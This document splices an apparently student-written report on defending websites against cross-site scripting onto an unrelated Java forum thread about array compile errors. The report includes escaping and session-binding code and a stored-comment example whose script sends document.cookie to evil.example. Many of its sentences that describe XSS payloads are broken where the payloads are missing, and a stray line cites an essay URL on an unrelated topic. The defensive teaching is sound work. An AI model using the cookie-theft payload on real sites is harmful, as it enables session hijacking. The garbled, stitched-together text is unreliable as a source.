You are a saint. After I thought I had fixed it, I realized that it still wasn't working correctly. I was embarrassed to come back and admit it, but then I saw your post. That seems to be the problem. Thanks for the tip on validate(); I was using repaint() and not getting anywhere.
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 08:54:00
Hmmm, the table shows in a scroll pane, but I can't use the scroll pane. Any thoughts on why, or what would cause it?
subject: Applet componets not showing
Paul Wheaton | http://www.coderanch.com/t/340074/GUI/java/Applet-componets-showing | CC-MAIN-2015-22 | refinedweb | 1,103 | 56.05 |
18 October 2012 11:05 [Source: ICIS news]
SINGAPORE (ICIS)--UAE’s Borouge plans to shut its 600,000 tonne/year ethane/propane cracker in December and its 1.5m tonne/year ethane cracker in Ruwais in January/February for maintenance for approximately a month each, a company spokesperson said on Thursday.
“We will have a turnaround in December for the Borouge 1 plants followed by another turnaround in January/February for the Borouge 2 plants,” the spokesperson said.
The dates are in line with the shutdown schedule of the producer’s derivative plants.
Both crackers are said to be operating at around 90-95% capacity currently, according to sources close to the company.
Traders said the turnarounds will have limited impact on Asia's spot ethylene market, as there have been limited exports from the UAE.
Borouge is a joint venture between Abu Dhabi National Oil Company (Adn | http://www.icis.com/Articles/2012/10/18/9604942/uaes-borouge-to-shut-crackers-for-maintenance.html | CC-MAIN-2014-49 | refinedweb | 149 | 51.89 |
If you haven't had a chance to look at the new PivotViewer control for Silverlight, have a look here or here. The PivotViewer enables visitors of your website to search large amounts of data very easily. The control takes a lot of work out of your hands. Basically, you tell it to load a collection and the PivotViewer takes care of everything else. Like adding controls to enter search and sort criteria. It uses DeepZoom to show large amounts of images and animate between states.
Before you can start coding, you have to download the control itself. The Silverlight control can be downloaded from the PivotViewer section on Silverlight.net. You also need the Silverlight Toolkit which can be found here.
To get your first PivotViewer control up and running, create a new Silverlight project in Visual Studio and add references to all 5 PivotViewer assemblies to the Silverlight project. These assemblies can be found in C:\Program Files\Microsoft SDKs\Silverlight\v4.0\PivotViewer\Jun10\Bin or C:\Program Files (x86)\Microsoft SDKs\Silverlight\v4.0\PivotViewer\Jun10\Bin on 64bit system.
In MainPage.xaml, add an XML namespace definition for the System.Windows.Pivot namespace and add the control to the LayoutRoot grid.
<UserControl x:Class="PivotViewerGettingStarted.MainPage"
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:Pivot="clr-namespace:System.Windows.Pivot;assembly=System.Windows.Pivot">
    <Grid x:Name="LayoutRoot">
        <Pivot:PivotViewer x:Name="Pivot" />
    </Grid>
</UserControl>
Getting data into the PivotViewer control has to be done in code-behind. The PivotViewer contains a method LoadCollection which takes a URL to a .CXML file. This file can be stored anywhere on the web and can be accessed as long as there is a valid ClientAccessPolicy.xml file available. For demonstration purposes, there are a couple of collections available on the GetPivot.com site (at the end of this tutorial, I've added a list of these). I've used the AMG Movies Collection in this case.
The LoadCollection method also needs a value for the state. Often this value is set to string.Empty.
public MainPage()
{
    InitializeComponent();
    Pivot.LoadCollection(
        "", // URL of the .CXML collection file
        string.Empty);
}
Take a look at the control running here.
While using the collections on GetPivot.com can be very useful for demonstrations or for learning how to develop with the PivotViewer, you won't use these collections in a real application. You will have to create a collection of your own. Have a look at the section of GetPivot.com about the Excel extension to create a collection.
Another way to create a collection is to let your program take control and build the collection at runtime. I will explain this in my next tutorial.
If you can’t wait and want to learn more, read the developer section on.
On the GetPivot.com site, there are a few more .CXML collections to try. | http://www.codeproject.com/Articles/102867/Building-Your-First-PivotViewer-Application?msg=3661534 | CC-MAIN-2015-40 | refinedweb | 465 | 60.11 |
LXD
LXD is a next-generation system container manager.
For those new to container technology, it would be good to first read the "Virtualization Concepts" section of the LXC article.
Key features of LXD include:
- It prefers to launch unprivileged containers (secure by default).
- A command-line client (lxc) interacts with a daemon (lxd).
- Configuration is made intuitive and scriptable through cascading profiles.
- Configuration changes are performed with the lxc command (not config files).
- Multiple hosts can be federated together (with a certificate-based trust system).
- A federated setup means that containers can be launched on remote machines and live-migrated between hosts (using CRIU technology).
- It is usable as a standalone hypervisor or integrated with OpenStack Nova
Contents
- 1 Quick start (single host)
- 2 Configuration
- 3 Multi-host setup
- 4 Advanced features
- 5 Troubleshooting
- 6 See also
Quick start (single host)
Prepare the system
Kernel configuration
It is a good idea to have most kernel flags required by app-emulation/lxc and sys-process/criu.
root #
ebuild /usr/portage/app-emulation/lxc/lxc-1.1.2.ebuild setup
...
 * Checking for suitable kernel configuration options...
 * CONFIG_NETLINK_DIAG: needed for lxc-checkpoint
 * CONFIG_PACKET_DIAG: needed for lxc-checkpoint
 * CONFIG_INET_UDP_DIAG: needed for lxc-checkpoint
 * CONFIG_INET_TCP_DIAG: needed for lxc-checkpoint
 * CONFIG_UNIX_DIAG: needed for lxc-checkpoint
 * CONFIG_CHECKPOINT_RESTORE: needed for lxc-checkpoint
 * Please check to make sure these options are set correctly.
 * Failure to do so may cause unexpected problems.

root #
ebuild /usr/portage/sys-process/criu/criu-1.6.1.ebuild setup

...
If you plan to run systemd-based unprivileged containers, you will probably need to enable "Gentoo Linux -> Support for init systems, system and service managers -> systemd" (CONFIG_GENTOO_LINUX_INIT_SYSTEMD)
Emerge
root #
emerge --ask lxd
Authorize a non-privileged user
root #
usermod --append --groups lxd erik
This will allow a non-root user to interact with the control socket which is owned by the lxd unix group. For the group change to take effect, users may need to log out and log back in again.
Configure subuid/subgid
root #
usermod --add-subuids 1000000-1065535 root
root #
usermod --add-subgids 1000000-1065535 root
In this setup, the user 0-65535 on the container will actually be seen on the host system as user 1000000+uid and 1000000+gid. This protects the host system, since if any container managed to break out of its sandboxed namespace, it could interact with the host system only as a process with an unknown, very high UID/GID.
Usermod is part of sys-apps/shadow which is needed for the subuid/subgid functionality.
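The mapping arithmetic above can be sketched in a few lines; this is an illustration only, not LXD code, and the base value is the one allocated by the usermod calls above.

```python
# Conceptual sketch: with the subordinate range root:1000000:65536, a UID
# inside the container appears on the host as base + uid.
SUBUID_BASE = 1000000

def host_uid(container_uid):
    """Return the host UID that a given container UID maps onto."""
    return SUBUID_BASE + container_uid

print(host_uid(0))      # container root appears on the host as 1000000
print(host_uid(1000))   # an ordinary container user appears as 1001000
```

This is why a process escaping the container namespace would land on the host as an unknown, very high UID with no special privileges.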
Setup storage and networking
root #
lxd init
Do you want to configure a new storage pool (yes/no) [default=yes]?
Name of the new storage pool [default=default]:
Name of the storage backend to use (dir, btrfs, lvm) [default=dir]: btrfs
Create a new BTRFS pool (yes/no) [default=yes]?
Would you like to use an existing block device (yes/no) [default=no]?
Would you like to create a new subvolume for the BTRFS storage pool (yes/no) [default=yes]:
Would you like LXD to be available over the network (yes/no) [default=no]?
Would you like stale cached images to be updated automatically (yes/no) [default=yes]?
Would you like to create a new network bridge (yes/no) [default=yes]? no
LXD has been successfully configured.
Configure the bridge
If a new bridge was created by
lxd init, start it now.
root #
rc-service net.lxcbr0 start
If desired, the bridge can be configured to come up automatically in the runlevel.
root #
rc-update add net.lxcbr0 default
Start the daemon
For OpenRC users:
root #
rc-service lxd start
A systemd unit file has also been installed.
/etc/conf.d/lxd has a few available options related to debug output, but the defaults are adequate for this quick start.
Launch a container
Add an image repository at a remote called "images":
user $
lxc remote add images
This is an untrusted remote, which can be a source of images that have been published with the --public flag. Trusted remotes are also possible, and are used as container hosts and also to serve private images. This specific remote is not special to LXD; organizations may host their own images.
user $
lxc image list images:
+--------------------------------+--------------+--------+-------------------------+---------+-------------------------------+
|             ALIAS              | FINGERPRINT  | PUBLIC |       DESCRIPTION       |  ARCH   |          UPLOAD DATE          |
+--------------------------------+--------------+--------+-------------------------+---------+-------------------------------+
|                                | 3ae185265c53 | yes    | Centos 6 (amd64)        | x86_64  | Aug 29, 2015 at 10:17pm (CDT) |
|                                | 369ac13f390e | yes    | Centos 6 (amd64)        | x86_64  | Sep 3, 2015 at 12:17pm (CDT)  |
| centos/6/amd64 (1 more)        | 8e54c679f1c2 | yes    | Centos 6 (amd64)        | x86_64  | Sep 3, 2015 at 10:17pm (CDT)  |
|                                | 755542362bbb | yes    | Centos 6 (i386)         | i686    | Aug 29, 2015 at 10:19pm (CDT) |
|                                | b4d26dbc6567 | yes    | Centos 6 (i386)         | i686    | Sep 3, 2015 at 12:20pm (CDT)  |
| centos/6/i386 (1 more)         | 21eeba48a2d4 | yes    | Centos 6 (i386)         | i686    | Sep 3, 2015 at 10:19pm (CDT)  |
|                                | 9fe7ffdbc0ae | yes    | Centos 7 (amd64)        | x86_64  | Aug 29, 2015 at 10:22pm (CDT) |
|                                | d750b910e62d | yes    | Centos 7 (amd64)        | x86_64  | Sep 3, 2015 at 12:23pm (CDT)  |
| centos/7/amd64 (1 more)        | 06c4e5c21707 | yes    | Centos 7 (amd64)        | x86_64  | Sep 3, 2015 at 10:22pm (CDT)  |
|                                | ee229d68be51 | yes    | Debian jessie (amd64)   | x86_64  | Aug 29, 2015 at 6:29pm (CDT)  |
|                                | 69e457e1f4ab | yes    | Debian jessie (amd64)   | x86_64  | Sep 2, 2015 at 6:34pm (CDT)   |
| debian/jessie/amd64 (1 more)   | 2ddd14ff9422 | yes    | Debian jessie (amd64)   | x86_64  | Sep 3, 2015 at 6:30pm (CDT)   |
|                                | 9fac01d1e773 | yes    | Debian jessie (armel)   | armv7l  | Aug 31, 2015 at 7:24pm (CDT)  |
|                                | 67f4fedafd2f | yes    | Debian jessie (armel)   | armv7l  | Sep 1, 2015 at 7:24pm (CDT)   |
...
There are Gentoo images in the list, although they are not maintained by the Gentoo project. LXC users may recognize these images as the same ones available using the "download" template.
user $
lxc launch images:centos/6/amd64 mycentos6
Creating mycentos6 done.
Starting mycentos6 done.
user $
lxc list
+-----------+---------+----------------+------+-----------+-----------+
|   NAME    |  STATE  |      IPV4      | IPV6 | EPHEMERAL | SNAPSHOTS |
+-----------+---------+----------------+------+-----------+-----------+
| mycentos6 | RUNNING | 192.168.43.240 |      | NO        | 0         |
+-----------+---------+----------------+------+-----------+-----------+
A shell can be run in the container's context.
user $
lxc exec mycentos6 /bin/bash
[root@mycentos6 ~]# ps faux
USER  PID %CPU %MEM    VSZ   RSS TTY     STAT START TIME COMMAND
root  428  0.0  0.0  11500  2648 ?       Ss   16:13 0:00 /bin/bash
root  440  0.0  0.0  13380  1888 ?       R+   16:13 0:00  \_ ps faux
root    1  0.0  0.0  19292  2432 ?       Ss   16:03 0:00 /sbin/init
root  188  0.0  0.0   4124  1316 console Ss+  16:03 0:00 /sbin/mingetty --nohangup console
root  228  0.0  0.0   9180  1392 ?       Ss   16:03 0:00 /sbin/dhclient -H mycentos6 -1 -q -lf /var/lib/dhclient/dhclient-eth0.leases -pf /var/run/dhc
root  278  0.0  0.0 171372  2544 ?       Sl   16:03 0:00 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
root  439  0.0  0.0   4120  1472 ?       Ss   16:13 0:00 /sbin/mingetty --nohangup /dev/tty[1-6]
While the container sees its processes as running as the root user, running
ps on the host shows the processes running as UID 1000000. This is the advantage of unprivileged containers: root is only root in the container, and is nobody special in the host. It is possible to manipulate the subuid/subgid maps to allow containers access to host resources (for example, write to the host's X socket) but this must be explicitly allowed.
Configuration
Configuration of containers is managed with the
lxc config and
lxc profile commands. The two commands provide largely the same capabilities, but
lxc config acts on single containers while
lxc profile configures a profile which can be used across multiple containers.
Importantly, containers can be launched with multiple profiles. The profiles have a cascading effect so that a profile specified later in the list can add, remove, and override configuration values that were specified in a earlier profile. This can allow for complex setups where groups of containers can be specified which share some properties but not others.
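Conceptually, the cascade behaves like an ordered dictionary merge, with later profiles overriding keys set by earlier ones. The sketch below is an illustration of that behaviour only, not LXD's actual implementation, and the profile contents are invented.

```python
# Conceptual sketch: LXD resolves the profile list left to right, as given
# on the command line, with later profiles adding or overriding keys.
def effective_config(*profiles):
    merged = {}
    for profile in profiles:
        merged.update(profile)   # later profiles win on conflicting keys
    return merged

default = {"eth0.parent": "lxcbr0", "limits.cpus": "4"}
cpusandbox = {"limits.cpus": "1"}   # overrides the value from "default"

print(effective_config(default, cpusandbox))
# {'eth0.parent': 'lxcbr0', 'limits.cpus': '1'}
```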
user $
lxc profile list
default migratable
user $
lxc profile show default
name: default
config: {}
devices:
  eth0:
    nictype: bridged
    parent: lxcbr0
    type: nic
The default profile is applied if no profile is specified on the command line. In the quick start, the
lxc launch omitted the profile, and so was equivalent to:
user $
lxc launch images:centos/6/amd64 mycentos6 --profile default
Notice that the default profile only specifies that a container should have a single NIC which is bridged onto an existing bridge lxcbr0. So, having a bridge with that name is not a hard requirement; it just happens to be named in the default profile.
Available configuration includes limits on memory and CPU cores, and also devices including NICs, bind mounts, and block/character device nodes.
Configuration is documented in /usr/share/doc/lxd-0.16/specs/configuration.md (substitute the correct version of course).
All documented configuration options are not yet implemented, and only by inspecting source code can a user know which devices might be expected to work. For example, at the time of this writing:
- The only legal nictype for an interface is "bridged"
- The "disk" device type can only perform bind mounts, and only on a directory.
- Setting limits.memory seems not to work, although limits.cpus does
Example
Here a container is launched with the default profile and also a "cpusandbox" profile which imposes a limit of one CPU core. A directory on the host is also bind-mounted into the container using the container-specific
lxc config command.
First, prepare a reusable profile.
user $
lxc profile create cpusandbox
Profile cpusandbox created
user $
lxc profile set cpusandbox limits.cpus 1
lxc config requires a container name, so a container is initialized.
user $
lxc init 8e54c679f1c2 confexample --profile default --profile cpusandbox
Creating confexample done.
The 8e54c679f1c2 argument represents an image fingerprint obtained with
lxc image list. It's possible to give friendly aliases to images.
In the quick start above, lxc launch was invoked, which is a shorthand for lxc init followed by lxc start. The latter is used in this example so that lxc config can be invoked before the container is first started.
In this example a host directory /tmp/shared is bind-mounted into the container at /tmp. While this could be configured in a profile, instead it will be considered an exclusive feature for that container.
user $
mkdir /tmp/shared
user $
touch /tmp/shared/hello.txt
Set the directory to be owned by the container's root user (really UID 1000000 in the host).
user $
sudo chown -R 1000000:1000000 /tmp/shared
user $
lxc config device add confexample sharedtmp disk path=/tmp source=/tmp/shared
Device sharedtmp added to confexample
user $
lxc start confexample
user $
lxc exec confexample ls /tmp
hello.txt
Multi-host setup
Two hosts on a network, alpha and beta, are running the lxd daemon. The goal is to run commands on alpha which can manipulate containers and images on either alpha or beta.
Resolvable names are prepared for readability but it also works to use IP addresses.
Setup
Configure the daemon on the remote to listen over HTTPS instead of the default local Unix socket.
beta $
lxc config set core.https_address beta:8443
Restart the daemon after this step, and be sure that the firewall will accept incoming connections as specified.
On beta configure a trust password, which is only used until certificates are exchanged.
beta $
lxc config set core.trust_password Sieth9gei7ahm2ra
Add the beta remote to alpha.
alpha $
lxc remote add beta
Certificate fingerprint: 7a 76 5b c6 c6 eb 4e db 20 7f 31 bb 1d 11 ca 2d c5 d8 7d cf 41 c0 a0 1f aa 8b c3 f0 18 79 d3 a3 ok (y/n)? y Admin password for beta: Client certificate stored at server: beta
Result
It is now possible to perform actions on beta from alpha using the remote: syntax
alpha $
lxc list beta:
alpha $
lxc remote list beta:
alpha $
lxc launch beta:centos6 beta:container0
alpha $
lxc info beta:container0
To copy containers or images, the source ("from") host must have its daemon listening via HTTPS not Unix socket.
alpha $
lxc image copy beta:gentlean local:
alpha $
lxc image copy centos6 beta:
error: The source remote isn't available over the network
As long as commands were run from alpha, it was never necessary to add alpha as a remote to either host. It was also not necessary to change alpha's core.https_address config setting to use HTTPS instead of Unix socket unless it is the source of a container or image copy.
Configuration settings and profiles are only set on the local host. They can be copied to remotes, but this is manual and error-prone unless configuration management tools are used to propagate these values. Consider requiring all commands to be run from a single host with its local config database for ease of administration.
Advanced features
Live migration
TODO
Automatic BTRFS integration
When LXD detects that /var/lib/lxd is on a Btrfs filesystem, it uses Btrfs' snapshot capabilities to ensure that images, containers and snapshots share blocks as much as possible. No user action is required to enable this behavior.
When the container was launched in the Quick Start section above LXD created subvolumes for the image and container. The container filesystem is a copy-on-write snapshot of the image.
root #
btrfs subvolume show /var/lib/lxd/images
/var/lib/lxd/images/8e54c679f1c293f909c66097d97de23c66a399d2dc396ade92b3b6aae1c732fe.btrfs
        Name:                   8e54c679f1c293f909c66097d97de23c66a399d2dc396ade92b3b6aae1c732fe.btrfs
        UUID:                   5530510e-2007-f146-9e0b-8c05480d63de
        Parent UUID:            -
        Received UUID:          -
        Creation time:          2015-09-04 15:03:32 -0500
        Subvolume ID:           330
        Generation:             4518
        Gen at creation:        4517
        Parent ID:              5
        Top level ID:           5
        Flags:                  -
        Snapshot(s):
                                var/lib/lxd/containers/mycentos6
Making a snapshot of the running container filesystem creates another copy-on-write snapshot.
user $
lxc snapshot mycentos6 firstsnap

ID 332 gen 4584 top level 5 path var/lib/lxd/snapshots/mycentos6/firstsnap
root #
btrfs subvolume show /var/lib/lxd/containers/mycentos6
/var/lib/lxd/containers/mycentos6
        Name:                   mycentos6
        UUID:                   fe6bfd65-d911-e449-a1df-be42d2997f4a
        Parent UUID:            5530510e-2007-f146-9e0b-8c05480d63de
        Received UUID:          -
        Creation time:          2015-09-04 15:03:39 -0500
        Subvolume ID:           331
        Generation:             4595
        Gen at creation:        4518
        Parent ID:              5
        Top level ID:           5
        Flags:                  -
        Snapshot(s):
                                var/lib/lxd/snapshots/mycentos6/firstsnap
/dev/lxd/sock
A socket is bind-mounted into the container at /dev/lxd/sock. It serves no critical purpose, but is available to users as a means to query configuration information about the container.
Troubleshooting
Cgroups inside Containers with OpenRC
As of 26th November 2017 there is an open bug with OpenRC (at least inside the container). Information on the state of the fix and a workaround (or possible fix) can be found here: (includes patching and an init file). Setting rc_sys="" inside the container works, too, but might break other things.
Proceed at own risk and create backups ;-)
Containers not starting under OpenRC
Recent OpenRC release brought "unified" cgroups and LXD doesn't seem to like that (it runs well under systemd which also has unified cgroups though...). The workaround for that is to disable unified cgroups. You do that by editing
/etc/rc.conf and setting
rc_cgroup_mode="legacy".
Running systemd based containers on OpenRC hosts
To support systemd-based containers (e.g. Ubuntu), two distinct changes are necessary: a) mount the host's cgroups automagically into the container:
user $
lxc config set <container> raw.lxc 'lxc.mount.auto = cgroup'
b) Create the system cgroup directory on the host and mount the cgroup there:
root #
mkdir -p /sys/fs/cgroup/systemd
root #
mount -t cgroup -o none,name=systemd systemd /sys/fs/cgroup/systemd
For more details take a look at the upstream issue on github.com
Best TypeScript Courses to take up this lockdown season!
Disclosure: This post includes affiliate links; our team may receive compensation if you purchase products or services from the different links provided in this article.
TypeScript is a superset of JavaScript. That means that if you already know JavaScript, you are ready to take this course. TypeScript adds several important features to JavaScript, including a type system. This type system is designed to help you catch errors during development, rather than when you are running your code. That means you will be twice as productive by catching bugs earlier in development. But besides the type system, TypeScript also provides several tools for structuring large codebases and writing truly reusable code.
TypeScript is an open-source language that provides support for building enterprise-scale JavaScript applications. Although several patterns exist that can be used to structure JavaScript, TypeScript provides container functionality that object-oriented developers are familiar with, such as classes and modules. It also supports strongly-typed code to ensure inappropriate values aren't assigned to variables in an application.
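The strong typing described above is what catches bad assignments before the code ever runs. A minimal illustrative sketch (the Order interface and values below are invented, not from any of the courses):

```typescript
// An interface declares the shape a value must have.
interface Order {
  id: number;
  total: number;
}

// The annotations let the compiler verify callers pass a well-formed Order.
function formatTotal(order: Order): string {
  return `Order ${order.id}: $${order.total.toFixed(2)}`;
}

const order: Order = { id: 42, total: 19.5 };
console.log(formatTotal(order)); // Order 42: $19.50

// The next line would be rejected by tsc at compile time, not at runtime:
// const bad: Order = { id: "42", total: 19.5 }; // Type 'string' is not assignable to type 'number'
```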
Thus, considering the dynamic nature and adaptability of Typescript, we have curated a list of Best Typescript Courses that you must take up in order to learn the skill.
1. Learn TypeScript (Ditch JavaScript)
Don't limit the Usage of TypeScript to Angular! Learn the Basics, its Features, Workflows and how to use it!
Course rating: 4.7 out of 5.0 ( 13,548 Ratings total)
In this course, you will learn the basics of TypeScript, its features and workflows, and how to use it.
You can take Learn TypeScript (Ditch JavaScript) Certificate Course on Udemy .
2. TypeScript Fundamentals
TypeScript Fundamentals walks you through the key concepts and features that you need to know to get started with TypeScript, and use it to build large (and small) scale JavaScript applications. Updated March 25, 2016 for TypeScript 1.8.
Course rating: 4.5 out of 5.0 ( 1847 Ratings total)
In this course, you will:
- Walk through the key concepts and features that you need to know to get started with TypeScript.
- Use TypeScript to build enterprise-scale JavaScript applications.
- Learn the role that TypeScript plays as well as key features that will help jump-start the learning process.
You can take TypeScript Fundamentals Certificate Course on Pluralsight .
3. Typescript: The Complete Developer's Guide [2020]
Master Typescript by learning popular design patterns and building complex projects. Includes React and Express!
Course rating: 4.7 out of 5.0 ( 3,297 Ratings total)
In this course, you will:
- Master design patterns for building large applications.
- Integrate Typescript into React/Redux or Express projects.
- Understand Composition vs Inheritance, and when to use each.
- Write reusable code powered by classes and interfaces.
- Assemble reusable boilerplates for your own Typescript projects.
You can take Typescript: The Complete Developer's Guide [2020] Certificate Course on Udemy .
4. TypeScript In-depth
This course will help you learn all of the major language features in the latest versions of TypeScript.
Course rating: 5.0 out of 5.0 ( 446 Ratings total)
In this course, you will:
- Learn TypeScript basics such as the new syntax for variable declarations.
- Progress through all of the major features of the language, including arrow functions, interfaces, classes, modules, namespaces, and generics.
- Learn not only the syntax, but also the benefits of the strong-typing support in TypeScript. TypeScript is an amazing language that compiles to JavaScript and is a perfect tool for building both client- and server-side web applications.
You can take TypeScript In-depth Certificate Course on Pluralsight .
5. Introduction to TypeScript Development
Get ready to build Angular 2 web and mobile applications by learning the TypeScript programming language.
Course rating: 4.4 out of 5.0 ( 1,239 Ratings total)
In this course, you will:
- Be ready to move on to building Angular 2 applications.
- Code with the TypeScript programming language.
- Work with TypeScript classes and object-oriented programming concepts.
- Work with closures, object-oriented programming, real-time asynchronous development, and decorators.
You can take the Introduction to TypeScript Development Certificate Course online.
In case you liked this article, you can also visit the following posts of mine.
Also, I would love to hear any feedback and review from you. Please tell me what you liked in the comment section below. Happy Learning!✨
Posted on Jun 25 by:
Devansh Agarwal
Software Engineer || Technical Writer || Social Evangelist
A Mac Sub Layer And The Physical Computer Science Essay
The present report predicts that fully and semi-automated techniques will aggressively emerge for targeting and hijacking web applications using XSS, thus eliminating the advantage of active human exploitation. A few of these techniques are detailed, together with solutions and workarounds for web application developers and users. The results from the questionnaire were analysed and compared against the website used to test XSS injection defences before and after the PHP improvements.
The browsers used for testing the XSS defences were Internet Explorer version 10.0.9200.16521, Firefox version 19.0.2 and Chrome version 25.0.1364.172 m. The end results were the same, although some of the activities were handled differently in Chrome than in the other browsers. The behaviour also depends on the plug-ins each browser already has enabled or that were configured by an IT expert.
Cross-site scripting vulnerabilities go back to 1996, the early days of the World Wide Web (WWW): a period when e-commerce was starting to lift off, the early days of Yahoo and Netscape, and the despised blink tag. Hundreds of thousands of Web pages were under construction, plagued by the tiny yellow street signs, and websites used HTML Frames (Hypertext Markup Language). The JavaScript programming language hit the scene, an unsuspected forerunner of XSS (cross-site scripting), and altered the security of web applications forever. JavaScript allowed page designers to create interactive effects including image rollovers, floating menus, and the despised pop-up window. Unimpressive by today's Asynchronous JavaScript and XML (AJAX) application standards, but soon enough hackers discovered a whole new unexplored world of possibilities. They found that when unsuspecting users visited their web pages, they could forcibly load any site (online stores, banks, Web mail, etc.) into an HTML frame inside the same browser window. Then, using JavaScript, they could cross the boundary between the two sites and read from one frame into the other. They were able to steal passwords typed into HTML forms, as well as cookies, or compromise any confidential information on the screen. The media reported the problem as a Web browser flaw. Netscape Communications, the predominant browser vendor, fought back by implementing the same-origin policy, a policy restricting JavaScript on one Web page from accessing data from another. Browser hackers took this as a challenge and started uncovering many clever ways to defeat the restriction (Grossman, J., 1999).
David Ross, in December 1999, ran security response at Microsoft for Internet Explorer. He was inspired by the work of Georgi Guninski, who at that time was finding flaws in Internet Explorer's security model. Ross demonstrated that Web content could expose script injection, effectively bypassing the same security guarantees bypassed by Guninski's Web browser code flaws, but where the fault appeared to exist on the server side rather than the client side, i.e. in the code. David described this in a Microsoft-internal paper entitled "Script Injection". The paper described the issue, how it is exploited, how an attack can be persisted using cookies, how an XSS (cross-site scripting) virus would be able to work, and how input/output (I/O) filtering solutions could be applied (Jeremiah, G., et al. 2007).
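The input/output filtering idea pointed to here survives today as output encoding: user-supplied text is HTML-escaped before being written into a page, so injected markup renders as inert text. A minimal sketch in JavaScript (the function name and the exact character set below are illustrative, not taken from the paper):

```javascript
// Escape the five characters that carry meaning in HTML, so that
// injected <script> tags are displayed rather than executed.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")   // must come first, or entities get double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const payload = '<script>alert("xss")</script>';
console.log(escapeHtml(payload));
// &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

Real applications should prefer the encoding functions of their platform (templating auto-escaping, or PHP's htmlspecialchars) over hand-rolled versions like this one.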
Finally, the above concept was shared publicly via CERT® Advisory CA-2000-02, "Malicious HTML Tags Embedded in Client Web Requests". The purpose of this was to inform the public so the issue would be revealed in a responsible way and sites would get fixed, not simply at Microsoft, but throughout the industry. In a discussion back in mid-January, the team in charge chose XSS (cross-site scripting) from a rather humorous list of proposals, stated below:
� Unauthorized Site Scripting
� Unofficial Site Scripting
� Uniform Resource Locator (URL) Parameter Script Insertion
� Cross-site Scripting
� Synthesized Scripting
� Fraudulent Scripting
On 25 January 2000, Microsoft met with the Computer Emergency Response Team (CERT), various vendors such as Apache, and other interested parties at a hotel in Bellevue, WA to discuss the idea. Ross rewrote the internal paper with the help of Ivan Brugiolo, John Coates, and Michael Roe so that it was suitable for public release. In coordination with CERT, Microsoft released this paper along with other materials in February 2000. Sometime during the intervening years the paper was removed from Microsoft.com. However, nothing ever dies on the Internet. It is now available elsewhere (Carnegie Mellon University, 2000).
Meanwhile, hackers of another sort had discovered a playground of HTML chat rooms, discussion boards, guest books, and Web mail providers: anywhere they could submit text laced with JavaScript and HTML into a website to infect other members. That is where the attack name "HTML Injection" comes from.
The hackers made rudimentary forms of JavaScript malware that they submitted into HTML forms to change screen names, steal cookies, adjust the Web page's colours, proclaim fake virus warnings, spoof derogatory messages, and perform other vaguely malicious digital mischief. Soon enough another variant of the same attack surfaced. With some social engineering, it turned out that tricking a user into clicking a specially crafted malicious link would yield the same results as HTML Injection. Users had no method of self-defence other than switching off JavaScript.
For years after it was first identified, the technique was referred to simply as a browser vulnerability with no special name. What were then called HTML Injection and malicious linking are now known as the variants of cross-site scripting called persistent and non-persistent cross-site scripting, respectively. This muddled terminology is the main reason so many people remain confused. To make matters worse, the acronym CSS was regularly mistaken for another browser technology with an earlier claim on the three-letter convention: Cascading Style Sheets. Eventually, someone sensibly suggested changing the cross-site scripting acronym from CSS to XSS to avoid the confusion, and it stuck: XSS had its identity. A flood of freshly minted white papers and a sea of vulnerability advisories followed, describing its potentially devastating impact. Few would listen (Carnegie Mellon University, 2000).
Before 2005, most security experts and developers paid little attention to XSS. The focus was transfixed on buffer overflows, botnets, viruses, worms, spyware, and the like. Meanwhile, a million new Web servers were appearing globally every month, turning perimeter firewalls into Swiss cheese and making SSL (Secure Sockets Layer) look quaint. Few took JavaScript, the enabler of XSS, seriously as an attack vector: it cannot root an operating system or directly exploit a database, so why care? How dangerous could clicking a link or visiting a Web site really be? In October 2005, we got the answer. Literally overnight, the Samy Worm, the first major XSS worm, managed to shut down the popular social networking site MySpace. Although its payload was almost benign, the Samy Worm was built to spread from one MySpace page to another, eventually infecting more than a million users within a day. Suddenly the security world was fully awake, and research into JavaScript malware broke out. A few short months later, in early 2006, intranet hacks, JavaScript port scanners, browser history stealers and keystroke-logging Trojan horses arrived to make a lasting impression. Numerous XSS vulnerabilities were disclosed in leading Web sites, and criminals began combining them with phishing scams into an effective fraud cocktail. Unsurprisingly so, since according to WhiteHat Security more than 70% of web sites were vulnerable. The Common Vulnerabilities and Exposures (CVE) project, a dictionary of publicly known vulnerabilities in commercial and open source products, stated that XSS had overtaken buffer overflows as the most frequently discovered vulnerability. XSS arguably stands as the most potentially disastrous vulnerability confronting information security and online businesses. These days, when an audience is asked whether they have heard of XSS, most hands go up (Schiller, G., et al, 2008).
Cross-site scripting (abbreviated XSS, formerly CSS) is among the most common application-level attacks that hackers use to sneak into web applications today. Cross-site scripting is an attack on the privacy of the clients of a particular web site that can lead to a total breach of security when customer data is stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client), the XSS attack involves three parties: the attacker, the site, and a client. The objective of the XSS attack is to steal the client's cookies, or any other sensitive information that can identify the client to the web site. With the legitimate user's token in hand, the attacker can act as that user in interactions with the site; in other words, impersonate the user. For example, in one audit conducted for a large company, it was possible to view a user's credit card number and personal information using an XSS attack. This was achieved by running malicious JavaScript code in the victim's (client's) browser, with the access privileges of the site. These are the very limited JavaScript privileges, which generally do not let the script access anything apart from site-related information. It should be stressed that although the vulnerability exists at the web site, the web site itself is never directly harmed. Yet that is enough for the script to collect the cookies and send them to the attacker. The result: the attacker steals the session cookies and impersonates the victim (Jovanovic, N., et. al., 2006).
Therefore, the questions raised for this report are, essentially: how can cross-site scripting (XSS) defences be improved to prevent XSS injections, and can survey-based methodologies be used to inform the defence against cross-site scripting injections?
This report aims to show the range of defence strategies for dealing with XSS (Cross-Site Scripting) attacks and how websites can be protected from XSS injections. In addition, it will present a variety of techniques that can be used to protect websites, demonstrated by developing a website for testing XSS injections. This will involve testing and running improved PHP code for XSS defences, supported by an online questionnaire designed to obtain information about how webmasters think about XSS injections.
Explanation
